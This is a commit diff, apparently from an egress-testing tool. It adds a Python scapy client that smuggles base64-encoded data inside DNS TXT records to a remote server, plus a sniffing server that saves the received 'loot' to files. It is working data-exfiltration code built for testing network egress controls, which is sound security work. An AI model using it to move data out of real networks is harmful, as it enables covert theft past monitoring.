Added DNS tunneling
parent
d51664aed6
commit
7bc76876b3
|
@ -6,6 +6,7 @@
|
|||
# capabilities.
|
||||
|
||||
|
||||
import logging
|
||||
import sys
|
||||
from common import helpers
|
||||
from common import orchestra
|
||||
|
@ -13,6 +14,8 @@ from common import orchestra
|
|||
|
||||
if __name__ == "__main__":
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||
|
||||
helpers.title_screen()
|
||||
|
||||
cli_parsed = helpers.cli_parser()
|
||||
|
|
|
@ -0,0 +1,74 @@
|
|||
'''
|
||||
|
||||
This is a DNS client that transmits data within DNS TXT requests
|
||||
Thanks to Raffi for his awesome blog posts on how this can be done
|
||||
http://blog.cobaltstrike.com/2013/06/20/thatll-never-work-we-dont-allow-port-53-out/
|
||||
|
||||
'''
|
||||
|
||||
import base64
|
||||
import re
|
||||
import socket
|
||||
import sys
|
||||
from scapy.all import *
|
||||
|
||||
|
||||
class Client:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
self.protocol = "dns"
|
||||
self.length = 62
|
||||
self.remote_server = cli_object.ip
|
||||
|
||||
def transmit(self, data_to_transmit):
|
||||
|
||||
byte_reader = 0
|
||||
packet_number = 1
|
||||
|
||||
# Determine if sending via IP or domain name
|
||||
if self.validate_ip(self.remote_server):
|
||||
final_destination = self.remote_server
|
||||
else:
|
||||
print "[*] Resolving IP of domain..."
|
||||
final_destination = socket.gethostbyname(self.remote_server)
|
||||
|
||||
while (byte_reader < len(data_to_transmit) + 35):
|
||||
encoded_data = base64.b64encode(data_to_transmit[byte_reader:byte_reader + 35])
|
||||
|
||||
# calcalate total packets
|
||||
if ((len(data_to_transmit) % 35) == 0):
|
||||
total_packets = len(data_to_transmit) / 35
|
||||
else:
|
||||
total_packets = (len(data_to_transmit) / 35) + 1
|
||||
|
||||
print "[*] Packet Number/Total Packets: " + str(packet_number) + "/" + str(total_packets)
|
||||
|
||||
# Craft the packet with scapy
|
||||
try:
|
||||
send(IP(dst=final_destination)/UDP()/DNS(
|
||||
id=15, opcode=0,
|
||||
qd=[DNSQR(qname="egress-assess.com", qtype="TXT")], aa=1, qr=0,
|
||||
an=[DNSRR(rrname=encoded_data, type="TXT", ttl=10)]),
|
||||
verbose=False)
|
||||
except KeyboardInterrupt:
|
||||
print "[*] Shutting down..."
|
||||
sys.exit()
|
||||
|
||||
# Increment counters
|
||||
byte_reader += 35
|
||||
packet_number += 1
|
||||
|
||||
return
|
||||
|
||||
def validate_ip(self, val_ip):
|
||||
# This came from (Mult-line link for pep8 compliance)
|
||||
# http://python-iptools.googlecode.com/svn-history/r4
|
||||
# /trunk/iptools/__init__.py
|
||||
ip_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}$')
|
||||
if ip_re.match(val_ip):
|
||||
quads = (int(q) for q in val_ip.split('.'))
|
||||
for q in quads:
|
||||
if q > 255:
|
||||
return False
|
||||
return True
|
||||
return False
|
|
@ -0,0 +1,55 @@
|
|||
'''
|
||||
|
||||
This is a DNS Listening/server module that listens for requests, and
|
||||
writes out data within TXT requests to a file
|
||||
|
||||
'''
|
||||
|
||||
import base64
|
||||
import time
|
||||
from common import helpers
|
||||
from scapy.all import *
|
||||
|
||||
|
||||
class Server:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
|
||||
self.protocol = "dns"
|
||||
self.last_packet = ''
|
||||
self.file_name = ''
|
||||
self.loot_path = ''
|
||||
|
||||
def customAction(self, packet):
|
||||
|
||||
if packet.haslayer(DNSRR):
|
||||
dnsrr_strings = repr(packet[DNSRR])
|
||||
try:
|
||||
incoming_data = base64.b64decode(dnsrr_strings.split('\'')[1].rstrip('.'))
|
||||
except TypeError:
|
||||
pass
|
||||
if incoming_data == self.last_packet:
|
||||
pass
|
||||
else:
|
||||
with open(self.loot_path + self.file_name, 'a') as dns_out:
|
||||
dns_out.write(incoming_data)
|
||||
self.last_packet = incoming_data
|
||||
return
|
||||
|
||||
def serve(self):
|
||||
|
||||
self.loot_path = os.path.join(helpers.ea_path(), "data") + "/"
|
||||
# Check to make sure the agent directory exists, and a loot
|
||||
# directory for the agent. If not, make them
|
||||
if not os.path.isdir(self.loot_path):
|
||||
os.makedirs(self.loot_path)
|
||||
|
||||
# Get the date info
|
||||
current_date = time.strftime("%m/%d/%Y")
|
||||
current_time = time.strftime("%H:%M:%S")
|
||||
self.file_name = current_date.replace("/", "") +\
|
||||
"_" + current_time.replace(":", "") + "text_data.txt"
|
||||
|
||||
print "[*] DNS server started!"
|
||||
sniff(prn=self.customAction)
|
||||
return
|
Loading…
Reference in New Issue